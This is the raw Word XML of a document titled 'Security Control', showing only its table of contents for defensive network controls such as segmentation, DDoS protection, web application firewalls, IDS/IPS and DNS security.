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650832" w:rsidRDefault="002C45CF" w:rsidP="002C45CF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00650832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Security Control</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="172902522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E4737EF" w14:textId="5230C1CB" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1560E70A" w14:textId="56852848" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">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36841618" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc236841618 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="418C2A9F" w14:textId="0ABC1F8D" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841619" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Apply network isolation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc236841619 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="394BF43F" w14:textId="70A01BBE" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841620" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NS-1: Establish network segmentation boundaries</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc236841620 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31E5F09A" w14:textId="6878A28A" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841621" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Secure network boundaries</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc236841621 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D4C0402" w14:textId="666D6B99" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841622" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">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_Toc236841622 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4842A62E" w14:textId="53FADBF3" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841623" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">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_Toc236841623 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FEE0A4D" w14:textId="58854B99" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841624" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NS-5: Deploy DDOS protection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc236841624 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A0E12C7" w14:textId="27595021" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841625" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NS-6: Deploy web application firewall</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc236841625 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78F317DC" w14:textId="16A24BF9" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841626" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NS-9: Connect on-premises or cloud network privately</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc236841626 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20E73C46" w14:textId="735D6AB8" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841627" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Monitor and respond</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc236841627 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62000BE4" w14:textId="1F18CC0B" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841628" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NS-4: Deploy intrusion detection/intrusion prevention</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> systems (IDS/IPS)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc236841628 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36D50817" w14:textId="7D1E1A72" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841629" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">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_Toc236841629 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25A4212A" w14:textId="46FEF5D7" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841630" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">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_Toc236841630 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="249914B0" w14:textId="6DC9CF3B" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc236841631" w:history="1">
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB7502">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NS-10: Ensure Domain Name System (DNS) security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc236841631 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D39A97B" w14:textId="72200A1C" w:rsidR="00C469AB" w:rsidRDefault="00C469AB">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="312EBA10" w14:textId="77777777" w:rsidR="002C45CF" w:rsidRDefault="002C45CF" w:rsidP="002C45CF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586CE880" w14:textId="77777777" w:rsidR="00B63114" w:rsidRDefault="00B63114" w:rsidP="002C45CF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27714058" w14:textId="77777777" w:rsidR="00B63114" w:rsidRDefault="00B63114" w:rsidP="002C45CF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EDEA41" w14:textId="77777777" w:rsidR="00B63114" w:rsidRDefault="00B63114" w:rsidP="002C45CF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
